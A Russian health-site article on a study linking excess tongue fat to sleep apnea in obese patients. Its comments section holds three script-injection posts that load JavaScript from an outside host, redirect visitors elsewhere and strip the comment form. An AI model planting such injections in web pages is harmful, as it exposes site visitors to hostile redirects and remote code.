Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Покажите свой язык, я ска...  >>  Покажите свой язык, я скажу, сколько вы проживете!
 
Обратная связь
 

Покажите свой язык, я скажу, сколько вы проживете!

Размер шрифта
20 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, от размера вашего языка зависит, грозит ли вам храп и ночное апноэ. Ученые установили, что у людей с большим языком риск возникновения апноэ очень высок, причем это особенно актуально для пациентов, страдающих ожирением.

Возможно результаты этого исследования смогут объяснить причину возникновения ночного апноэ у людей, страдающих избыточным весом. Ученые выяснили, что у пациентов с ожирением и ночным апноэ размер языка значительно больше, чем у пациентов с ожирением, но без апноэ. Также для пациентов с апноэ сна было характерно повышенное содержание жировой ткани в языке. Причем, как выяснилось, жировая ткань у таких пациентов была распределена в языке строго определенным образом: наибольшее ее количество находилось возле основания языка.

В исследовании приняли участие 90 пациентов с ожирением и ночным апноэ. В контрольную группу вошли пациенты с ожирением, но без апноэ. Всем участникам была проведена магнитно-резонансная томография верхних дыхательных путей. Для того чтобы определить количество жира и его расположение в языке, были применены компьютерные алгоритмы обработки снимков. Ученые считают, что жировая ткань не просто увеличивает размеры языка, она также нарушает работу мышц, которые фиксируют язык к кости. А функция этих мышц состоит как раз в том, чтобы не давать языку перекрывать дыхательные пути.

«Нам впервые удалось показать, что в языке пациентов с ночным апноэ присутствует избыточное количество жировой ткани», – рассказывает доктор Ричард Шваб, профессор Университета Пенсильвании и ведущий автор работы. «Мы получили новые данные, которые могут объяснить связь между возникновением апноэ и ожирением». Результаты этого исследования были опубликованы в журнале Sleep.

«Размер языка – один из параметров, который обязательно должен учитывать врач при осмотре пациента с избыточным весом, так как именно это может говорить о повышенном риске развития апноэ», – объясняет доктор Тимоти Моргентхалер, президент Американской Академии по изучению сна. «Очень важно вовремя диагностировать это состояние, ведь оно связано с развитием многих других проблем со здоровьем, таких как артериальная гипертензия, болезни сердца, диабет второго типа, инсульт». В дальнейшем ученые планируют выяснить, снижается ли количество жировой ткани в языке при снижении массы тела, а также разработать новые способы для лечения апноэ.

Врачи предупреждают, что избыточный вес – основной фактор риска развития ночного апноэ. Его симптомы – это храп, удушье или же паузы в дыхании во время сна. Так что если вы обнаружили у себя хотя бы один из этих симптомов – обязательно обратитесь к врачу.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:14

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не выспались? Вы потолстеете!   Муж храпит? Спасайте его – он глупеет!   Задал храпака – проснулся с диабетом! Как спать, чтобы не заболеть?   5 неожиданных причин, почему вы толстеете  
30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 15 июля 2013Сколько нужно спать, чтобы помнить все
 

Слайдшоу

1
Что делать, если муж храпит?
Сумасшедший сон! Как спать нормально?
Кончай храпеть!

Тесты

1
Хорошо ли Вы спите?
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.